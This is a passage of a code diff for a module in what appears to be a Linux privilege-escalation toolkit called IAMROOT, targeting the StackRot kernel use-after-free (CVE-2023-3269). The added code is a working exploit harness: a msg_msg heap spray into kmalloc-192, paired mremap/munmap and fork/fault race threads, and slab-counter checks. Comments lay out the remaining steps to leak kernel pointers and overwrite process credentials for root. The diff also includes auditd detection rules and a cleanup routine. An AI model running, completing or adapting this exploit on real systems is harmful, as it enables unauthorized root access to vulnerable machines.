if (msgsnd(q, &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return created;
|
||||||
|
}
|
||||||
|
|
||||||
|
static void drain_anon_vma_slab(int queues[STACKROT_SPRAY_QUEUES])
|
||||||
|
{
|
||||||
|
for (int i = 0; i < STACKROT_SPRAY_QUEUES; i++) {
|
||||||
|
if (queues[i] >= 0) msgctl(queues[i], IPC_RMID, NULL);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Read /proc/slabinfo for kmalloc-192 active count. Used as the
|
||||||
|
* primary empirical witness: a successful UAF + refill perturbs
|
||||||
|
* this counter in a way that's distinguishable from idle drift. */
|
||||||
|
static long slab_active_kmalloc_192(void)
|
||||||
|
{
|
||||||
|
FILE *f = fopen("/proc/slabinfo", "r");
|
||||||
|
if (!f) return -1;
|
||||||
|
char line[512];
|
||||||
|
long active = -1;
|
||||||
|
while (fgets(line, sizeof line, f)) {
|
||||||
|
if (strncmp(line, "kmalloc-192 ", 12) == 0) {
|
||||||
|
char name[64];
|
||||||
|
long act = 0, num = 0;
|
||||||
|
if (sscanf(line, "%63s %ld %ld", name, &act, &num) >= 2) {
|
||||||
|
active = act;
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
fclose(f);
|
||||||
|
return active;
|
||||||
|
}
|
||||||
|
|
||||||
|
#endif /* __linux__ */
|
||||||
|
|
||||||
|
/* ---- Exploit driver ---------------------------------------------- */
|
||||||
|
|
||||||
|
#ifdef __linux__
|
||||||
|
|
||||||
|
static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
|
||||||
|
{
|
||||||
|
/* 1. Refuse-gate: re-call detect() and short-circuit. */
|
||||||
|
iamroot_result_t pre = stackrot_detect(ctx);
|
||||||
|
if (pre == IAMROOT_OK) {
|
||||||
|
fprintf(stderr, "[+] stackrot: kernel not vulnerable; refusing exploit\n");
|
||||||
|
return IAMROOT_OK;
|
||||||
|
}
|
||||||
|
if (pre != IAMROOT_VULNERABLE) {
|
||||||
|
fprintf(stderr, "[-] stackrot: detect() says not vulnerable; refusing\n");
|
||||||
|
return pre;
|
||||||
|
}
|
||||||
|
if (geteuid() == 0) {
|
||||||
|
fprintf(stderr, "[i] stackrot: already root — nothing to escalate\n");
|
||||||
|
return IAMROOT_OK;
|
||||||
|
}
|
||||||
|
if (!proc_self_maps_readable()) {
|
||||||
|
fprintf(stderr, "[-] stackrot: /proc/self/maps not readable — exotic env, "
|
||||||
|
"cannot drive the race\n");
|
||||||
|
return IAMROOT_PRECOND_FAIL;
|
||||||
|
}
|
||||||
|
{
|
||||||
|
struct kernel_version v;
|
||||||
|
if (!kernel_version_current(&v) || !maple_tree_variant_present(&v)) {
|
||||||
|
fprintf(stderr, "[-] stackrot: maple-tree variant not detectable\n");
|
||||||
|
return IAMROOT_PRECOND_FAIL;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] stackrot: forking exploit child (userns + race harness)\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
uid_t outer_uid = getuid();
|
||||||
|
gid_t outer_gid = getgid();
|
||||||
|
signal(SIGPIPE, SIG_IGN);
|
||||||
|
|
||||||
|
pid_t child = fork();
|
||||||
|
if (child < 0) { perror("fork"); return IAMROOT_TEST_ERROR; }
|
||||||
|
|
||||||
|
if (child == 0) {
|
||||||
|
/* 2. Userns reach. Bug is reachable without it, but userns
|
||||||
|
* + uid_map=0 makes the groom more predictable (fewer
|
||||||
|
* competing kmalloc-192 allocations from the parent
|
||||||
|
* namespace's tooling). */
|
||||||
|
if (!enter_userns(outer_uid, outer_gid)) {
|
||||||
|
fprintf(stderr, "[~] stackrot: enter_userns failed — continuing without "
|
||||||
|
"namespace isolation (bug is still reachable)\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
/* 3. Race region. */
|
||||||
|
struct race_region region;
|
||||||
|
if (!race_region_setup(®ion)) {
|
||||||
|
fprintf(stderr, "[-] stackrot: race_region_setup failed: %s\n",
|
||||||
|
strerror(errno));
|
||||||
|
_exit(22);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* 4. Groom: pre-populate kmalloc-192 with msg_msg payloads
|
||||||
|
* BEFORE the race so the freed slot gets recycled with
|
||||||
|
* attacker-controlled bytes when the bug fires. */
|
||||||
|
int queues[STACKROT_SPRAY_QUEUES] = {0};
|
||||||
|
int n_queues = spray_anon_vma_slab(queues);
|
||||||
|
if (n_queues == 0) {
|
||||||
|
fprintf(stderr, "[-] stackrot: msg_msg spray produced 0 queues\n");
|
||||||
|
race_region_teardown(®ion);
|
||||||
|
_exit(23);
|
||||||
|
}
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] stackrot: kmalloc-192 spray seeded %d queues x %d msgs\n",
|
||||||
|
n_queues, STACKROT_SPRAY_PER_QUEUE);
|
||||||
|
}
|
||||||
|
|
||||||
|
long slab_pre = slab_active_kmalloc_192();
|
||||||
|
|
||||||
|
/* 5. Run the race for a bounded time budget. */
|
||||||
|
atomic_store(&g_race_running, 1);
|
||||||
|
atomic_store(&g_race_a_iters, 0);
|
||||||
|
atomic_store(&g_race_b_iters, 0);
|
||||||
|
atomic_store(&g_race_b_faults, 0);
|
||||||
|
pthread_t ta, tb;
|
||||||
|
if (pthread_create(&ta, NULL, race_thread_a, ®ion) != 0 ||
|
||||||
|
pthread_create(&tb, NULL, race_thread_b, ®ion) != 0) {
|
||||||
|
fprintf(stderr, "[-] stackrot: pthread_create failed\n");
|
||||||
|
atomic_store(&g_race_running, 0);
|
||||||
|
drain_anon_vma_slab(queues);
|
||||||
|
race_region_teardown(®ion);
|
||||||
|
_exit(24);
|
||||||
|
}
|
||||||
|
|
||||||
|
sleep(STACKROT_RACE_TIME_BUDGET);
|
||||||
|
atomic_store(&g_race_running, 0);
|
||||||
|
pthread_join(ta, NULL);
|
||||||
|
pthread_join(tb, NULL);
|
||||||
|
|
||||||
|
long slab_post = slab_active_kmalloc_192();
|
||||||
|
uint64_t a_iters = atomic_load(&g_race_a_iters);
|
||||||
|
uint64_t b_iters = atomic_load(&g_race_b_iters);
|
||||||
|
uint64_t b_faults = atomic_load(&g_race_b_faults);
|
||||||
|
|
||||||
|
/* 6. Empirical witness breadcrumb. */
|
||||||
|
FILE *log = fopen("/tmp/iamroot-stackrot.log", "w");
|
||||||
|
if (log) {
|
||||||
|
fprintf(log,
|
||||||
|
"stackrot race harness:\n"
|
||||||
|
" thread_a_iters = %llu (mremap/munmap)\n"
|
||||||
|
" thread_b_iters = %llu (fork+fault)\n"
|
||||||
|
" thread_b_faults = %llu (child died on signal)\n"
|
||||||
|
" slab_kmalloc192_pre = %ld\n"
|
||||||
|
" slab_kmalloc192_post = %ld\n"
|
||||||
|
" slab_delta = %ld\n"
|
||||||
|
" spray_queues = %d\n"
|
||||||
|
" spray_per_queue = %d\n"
|
||||||
|
" growsdown_len = %zu\n"
|
||||||
|
"Note: this run did NOT attempt cred overwrite (no leak\n"
|
||||||
|
"primitive; per-kernel offsets unknown). See module .c\n"
|
||||||
|
"for the continuation roadmap.\n",
|
||||||
|
(unsigned long long)a_iters,
|
||||||
|
(unsigned long long)b_iters,
|
||||||
|
(unsigned long long)b_faults,
|
||||||
|
slab_pre, slab_post,
|
||||||
|
(slab_post >= 0 && slab_pre >= 0) ? (slab_post - slab_pre) : 0,
|
||||||
|
n_queues, STACKROT_SPRAY_PER_QUEUE,
|
||||||
|
(size_t)region.growsdown_len);
|
||||||
|
fclose(log);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] stackrot: race ran for %ds — A=%llu B=%llu B_faults=%llu\n",
|
||||||
|
STACKROT_RACE_TIME_BUDGET,
|
||||||
|
(unsigned long long)a_iters,
|
||||||
|
(unsigned long long)b_iters,
|
||||||
|
(unsigned long long)b_faults);
|
||||||
|
fprintf(stderr, "[*] stackrot: kmalloc-192 active: pre=%ld post=%ld\n",
|
||||||
|
slab_pre, slab_post);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Hold the spray so the kernel observes refilled slots during
|
||||||
|
* any in-flight RCU grace periods that started during the race. */
|
||||||
|
usleep(200 * 1000);
|
||||||
|
|
||||||
|
drain_anon_vma_slab(queues);
|
||||||
|
race_region_teardown(®ion);
|
||||||
|
|
||||||
|
/* 7. Continuation roadmap — what would land EXPLOIT_OK.
|
||||||
|
*
|
||||||
|
* TODO(leak): replace one of the spray queues with a
|
||||||
|
* msgrcv(..., MSG_COPY|IPC_NOWAIT) probe and scan the
|
||||||
|
* returned buffer for non-cookie bytes. The bug's UAF
|
||||||
|
* write leaves a kernel pointer (anon_vma->root or the
|
||||||
|
* mas->node parent) at a known offset inside the freed
|
||||||
|
* slab slot. Recover {kbase, init_task} via that leak.
|
||||||
|
*
|
||||||
|
* TODO(write): with kbase known, repeat the trigger but
|
||||||
|
* plant a fake anon_vma_chain whose `rb_node` parent
|
||||||
|
* pointer points at ¤t->cred — the maple-tree
|
||||||
|
* rotation writes a controlled value into that location.
|
||||||
|
* Crafting the fake AVC requires offset of anon_vma_chain
|
||||||
|
* fields per kernel build (CONFIG_DEBUG_LIST/KFENCE/etc.
|
||||||
|
* perturb the layout — must NOT be hardcoded).
|
||||||
|
*
|
||||||
|
* TODO(overwrite): land &init_cred over current->cred so
|
||||||
|
* the next call to a permission check sees uid==0.
|
||||||
|
*
|
||||||
|
* None of these are implemented today. We exit 30 to
|
||||||
|
* flag "trigger ran cleanly, no escalation".
|
||||||
|
*/
|
||||||
|
_exit(30);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* PARENT */
|
||||||
|
int status = 0;
|
||||||
|
pid_t w = waitpid(child, &status, 0);
|
||||||
|
if (w < 0) { perror("waitpid"); return IAMROOT_TEST_ERROR; }
|
||||||
|
|
||||||
|
if (WIFSIGNALED(status)) {
|
||||||
|
int sig = WTERMSIG(status);
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[!] stackrot: race child killed by signal %d "
|
||||||
|
"(consistent with UAF firing under KASAN)\n", sig);
|
||||||
|
fprintf(stderr, "[~] stackrot: empirical signal recorded; no cred\n"
|
||||||
|
" overwrite primitive — NOT claiming EXPLOIT_OK.\n"
|
||||||
|
" See /tmp/iamroot-stackrot.log + dmesg for witnesses.\n");
|
||||||
|
}
|
||||||
|
return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!WIFEXITED(status)) {
|
||||||
|
fprintf(stderr, "[-] stackrot: child terminated abnormally (status=0x%x)\n",
|
||||||
|
status);
|
||||||
|
return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
}
|
||||||
|
|
||||||
|
int rc = WEXITSTATUS(status);
|
||||||
|
if (rc == 22 || rc == 24) return IAMROOT_PRECOND_FAIL;
|
||||||
|
if (rc == 23) return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
if (rc != 30) {
|
||||||
|
fprintf(stderr, "[-] stackrot: child failed at stage rc=%d\n", rc);
|
||||||
|
return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] stackrot: race harness ran to completion.\n");
|
||||||
|
fprintf(stderr, "[~] stackrot: read/write/cred-overwrite primitives NOT\n"
|
||||||
|
" implemented (per-kernel offsets; see module .c TODO\n"
|
||||||
|
" blocks). Returning EXPLOIT_FAIL per verified-vs-claimed.\n");
|
||||||
|
}
|
||||||
|
return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
}
|
||||||
|
|
||||||
|
#endif /* __linux__ */
|
||||||
|
|
||||||
static iamroot_result_t stackrot_exploit(const struct iamroot_ctx *ctx)
|
static iamroot_result_t stackrot_exploit(const struct iamroot_ctx *ctx)
|
||||||
{
|
{
|
||||||
|
#ifdef __linux__
|
||||||
|
return stackrot_exploit_linux(ctx);
|
||||||
|
#else
|
||||||
(void)ctx;
|
(void)ctx;
|
||||||
fprintf(stderr,
|
fprintf(stderr, "[-] stackrot: Linux-only module; cannot run on this host\n");
|
||||||
"[-] stackrot: exploit not yet implemented in IAMROOT.\n"
|
|
||||||
" Status: 🔵 DETECT-ONLY. Reference: Ruihan Li's public PoC\n"
|
|
||||||
" (~1000 lines maple-tree state + RCU grace period timing).\n"
|
|
||||||
" Exploit shape: mmap many VMAs → split via mprotect to trigger\n"
|
|
||||||
" maple node use-after-RCU → cross-cache groom → kernel R/W\n"
|
|
||||||
" → cred overwrite.\n");
|
|
||||||
return IAMROOT_PRECOND_FAIL;
|
return IAMROOT_PRECOND_FAIL;
|
||||||
|
#endif
|
||||||
}
|
}
|
||||||
|
|
||||||
|
/* ---- Cleanup ----------------------------------------------------- */
|
||||||
|
|
||||||
|
static iamroot_result_t stackrot_cleanup(const struct iamroot_ctx *ctx)
|
||||||
|
{
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] stackrot: cleaning up race-harness breadcrumb\n");
|
||||||
|
}
|
||||||
|
if (unlink("/tmp/iamroot-stackrot.log") < 0 && errno != ENOENT) {
|
||||||
|
/* harmless */
|
||||||
|
}
|
||||||
|
/* The race harness's threads + msg queues live in the child
|
||||||
|
* process which has already exited; nothing else to drain. */
|
||||||
|
return IAMROOT_OK;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* ---- Detection rules --------------------------------------------- */
|
||||||
|
|
||||||
static const char stackrot_auditd[] =
|
static const char stackrot_auditd[] =
|
||||||
"# StackRot (CVE-2023-3269) — auditd detection rules\n"
|
"# StackRot (CVE-2023-3269) — auditd detection rules\n"
|
||||||
"# Hard to detect via syscall hooks alone — the trigger is mprotect/\n"
|
"# The trigger is mremap/munmap/mprotect bursts against MAP_GROWSDOWN\n"
|
||||||
"# munmap with specific VMA-split patterns. Flag unusual high-volume\n"
|
"# stacks, combined with unshare(CLONE_NEWUSER). Each individual call\n"
|
||||||
"# mprotect bursts from non-root processes.\n"
|
"# is benign — flag the *combination* by correlating these keys with a\n"
|
||||||
"-a always,exit -F arch=b64 -S mprotect -F success=1 -k iamroot-stackrot\n";
|
"# subsequent kernel oops or KASAN message in dmesg.\n"
|
||||||
|
"-a always,exit -F arch=b64 -S unshare -k iamroot-stackrot-userns\n"
|
||||||
|
"-a always,exit -F arch=b64 -S mremap -k iamroot-stackrot-mremap\n"
|
||||||
|
"-a always,exit -F arch=b64 -S mprotect -k iamroot-stackrot-mprotect\n"
|
||||||
|
"-a always,exit -F arch=b64 -S munmap -F success=1 -k iamroot-stackrot-munmap\n";
|
||||||
|
|
||||||
const struct iamroot_module stackrot_module = {
|
const struct iamroot_module stackrot_module = {
|
||||||
.name = "stackrot",
|
.name = "stackrot",
|
||||||
@@ -118,7 +737,7 @@ const struct iamroot_module stackrot_module = {
|
|||||||
.detect = stackrot_detect,
|
.detect = stackrot_detect,
|
||||||
.exploit = stackrot_exploit,
|
.exploit = stackrot_exploit,
|
||||||
.mitigate = NULL,
|
.mitigate = NULL,
|
||||||
.cleanup = NULL,
|
.cleanup = stackrot_cleanup,
|
||||||
.detect_auditd = stackrot_auditd,
|
.detect_auditd = stackrot_auditd,
|
||||||
.detect_sigma = NULL,
|
.detect_sigma = NULL,
|
||||||
.detect_yara = NULL,
|
.detect_yara = NULL,
|
||||||
|
|||||||
Reference in New Issue
Block a user